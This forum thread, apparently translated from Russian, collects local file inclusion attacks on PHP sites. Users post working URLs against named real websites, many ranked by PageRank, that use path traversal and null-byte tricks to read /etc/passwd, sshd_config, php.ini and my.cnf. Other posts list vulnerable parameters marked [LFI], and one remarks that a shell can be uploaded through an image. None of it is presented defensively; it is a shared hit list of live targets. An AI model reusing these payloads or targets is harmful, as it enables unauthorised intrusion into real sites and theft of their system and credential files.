PHP Injections

Discussion in 'Vulnerabilities' started by Joker-jar, 20 Apr 2007.

  1. nik3241

    nik3241 Member

    a site about fighting drug addicts

    Code:
    http://nobf.ru/index.php/download.php?file=../../../../../../etc/passwd
     
  2. RulleR

    RulleR Elder

    Code:
    http://ezonet.ru/reports.php?page=../index.php
    Code:
    http://www.911pcar.com/index.php?page=../../../etc/passwd
    Code:
    http://aplus-computer.net/myspacegraphicshelper/onlinepss//index.php?page=../index.php
     
    #902 RulleR, 6 Jun 2009
  3. RulleR

    RulleR Elder

    [PR 4]
    Code:
    http://triod.kiev.ua/index.php?page=index.php
    [PR 4]
    Code:
    http://www.chicagohungarians.com/index.php?page=/etc/passwd
    [PR 3]
    Code:
    http://www.dbd.com.au/index.php?page=index.php
    [PR 0]
    Code:
    http://legeartis-stom.com/index.php?page=/etc/passwd
     
    #903 RulleR, 8 Jun 2009
  4. BHYCHIK

    BHYCHIK Member

    http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00

    Site directory: /usr/www/cyl.ru/www/
     
  5. Gorev

    Gorev Level 8

    http://www.lohuis.ro/index.php?page=../../../../../../../../../../etc/passwd%00
     
  6. Pashkela

    Pashkela Dinosaur

    Haven't checked for reposts:
    Code:
    http://www.americascup.com/es/acmag/votre_interview/index.php?idContent=12688&idIndex=../../../../../../../../../../etc/passwd%00
    
    http://www.clubedoexercito.com.br/index.php?arq=/home/httpd/vhosts/clubedoexercito.com.br/httpdocs/index
    
    http://www.inoticia.com.br/index.php?arq=/home/httpd/vhosts/inoticia.com.br/httpdocs/config/config
    
    http://www.aciub.com.br/index.php?arq=/var/www/dominios/www.aciub.com.br/site/index
    
    http://www.coacyle.com/index.php?sec=D:%5CTrabajos%5Cwwwcoacyle%5Ccontrol%5Cincludes%5Cfunciones&id=81
    
     
  7. mailbrush

    mailbrush Well-Known Member

    http://www.dalcomstechnologies.com/products.php?id=[LFI]
     
  8. [aywo]

    [aywo] Elder

    PR 4
    http://toyota.mnc.ru/?path=../../../etc/&file=passwd


    PR 3
    http://www.divetrade.ru/magazin/index.php?page=../../../../../../../../../../etc/passwd
    (online shop on FreeBSD)

    PR 3
    http://www.autosport.com.ua/index.php?part=FAU&page=../../../../../../../../../../../etc/passwd

    PR 3
    http://www.alpha-sport.ru/index.php?page=index.php

    PR 2
    http://www.basegroup.su/index.php?Page=/../../../../../../../../../../../etc/passwd
     
    #908 [aywo], 16 Jun 2009
  9. mailbrush

    mailbrush Well-Known Member

    Code:
    http://www.ahoj-brause.de/produkte.php?id=3&sub=[LFI]
     
  10. geforse

    geforse Elder

    PR4
    Code:
    http://tunguska.sai.msu.ru/index.php?q=[LFI]
    PR0
    Code:
    http://obti.com.ua/modules/mod_focalizar_ajaxmodule/js/file_includer.php?file=[LFI]
    
    http://www.uspeh-b.ru/modules/mod_focalizar_ajaxmodule/js/file_includer.php?file=[LFI]
     
  11. Adm1n4eG

    Adm1n4eG Member

    Code:
    http://www.govor.ru/visit/tours/i mg.php?location=/etc/passwd
    save it and open it...
     
  12. geforse

    geforse Elder

    PR2
    Code:
    http://catviz.sourceforge.net/index.php?userman_form=../../../../../../../../../../../../../etc/passwd
     
  13. $n@ke

    $n@ke Elder

    gaff
     
  14. Dj-Matrix

    Dj-Matrix New Member

    http://www.midland.edu/success/students.php?page=../../robots.txt
     
  15. AlexSatter

    AlexSatter Member

    http://inss.ru/index.php?id=index.php
     
  16. geforse

    geforse Elder


    PR3
    Code:
    http://www.galileo-tv.ru/inner.php?page=[LFI]
    A shell can be uploaded through an image
     
  17. Pashkela

    Pashkela Dinosaur

    A handful of injections and file readers, including blind ones; most of these have probably been posted before, since I haven't yet seen scanners for the case where errors are not displayed:

     
  18. Pashkela

    Pashkela Dinosaur

     
  19. AlexSatter

    AlexSatter Member

    http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../etc/passwd
    http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../etc/ssh/sshd_config
    http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../usr/local/etc/php.ini
    http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../etc/my.cnf
    ----

    http://tequilajazzz.com/zzz.php?zzz=zzz.php%00

    ---

    http://valganoored.leadmaster.pri.ee/?id=index.php%00

    ---

    http://radomiak.info/index.php?id=index.php%00

    ---

    http://www.classic-appraisals.com/?id=index.php
     
    #919 AlexSatter, 25 Jun 2009
  20. Pashkela

    Pashkela Dinosaur

     